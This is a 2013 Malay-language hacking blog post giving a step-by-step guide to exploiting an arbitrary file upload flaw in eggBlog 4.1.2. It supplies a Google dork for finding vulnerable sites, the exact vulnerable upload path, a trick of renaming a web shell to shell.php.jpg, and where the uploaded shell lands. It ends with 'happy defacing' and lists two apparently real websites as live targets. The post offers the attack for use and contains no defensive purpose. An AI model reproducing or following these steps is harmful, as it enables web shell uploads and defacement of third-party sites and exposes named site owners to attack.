Tuesday, 14 May 2013

eggBlog 4.1.2 - Arbitrary File Upload Deface

Assalamualaikum dan salam sejahtera. Entry hari ni aku nak share exploit cms eggBlog.Exploit ni korang boleh upload file macam shell dan deface.

1. Google Dork :
"powered by eggBlog.net"


2. Buka mana2 web yang korang dapat kat google, dan tambah kat hujung url :
/_lib/openwysiwyg/addons/imagelibrary/insert_image.php?wysiwyg=

contoh korang dapat http://site.com/


Tukar ke :


http://site.com/_lib/openwysiwyg/addons/imagelibrary/insert_image.php?wysiwyg=


3. Kemudian korang akan nampak lebih kurang macam ni :


Ok bila dah keluar macam ni, tekan choose file dan pilih la shell korang! shell tu korang kena rename jadi shell.php.jpg .


Lepas tu tekan Upload :D

note1 : main2 dengan extension file untuk upload.hehe
note2: 
Kalau tak keluar mcm ni maksudnya web tu x vuln.cari web lain.

4. Lepas dah upload shell, untuk tengok hasil korang cari nama shell korang kat tepi tu dan click.Nanti akan ada keluar link shell korang tu dekat kotak image url.rujuk gambar :



Ataupun tukar kat hujung url :

/photos/uploads/shell.php.jpg

Ok siap! happy defacing...

Live demo :http://www.knallkopf.ch/blog/_lib/openwysiwyg/addons/imagelibrary/insert_image.php?wysiwyg=
http://www.mrcromwellsattic.com/blog/_lib/openwysiwyg/addons/imagelibrary/insert_image.php?wysiwyg=

Incoming Search Terms :
eggblog eggblogg eggblog themes powered by eggblog
Item Reviewed: eggBlog 4.1.2 - Arbitrary File Upload Deface Description: Rating: 5 Reviewed By Afif Zafri

Share:

Popular Posts

© 2011 - Reaperz All rights reserved | Theme Designed by Seo Blogger Templates DMCA.com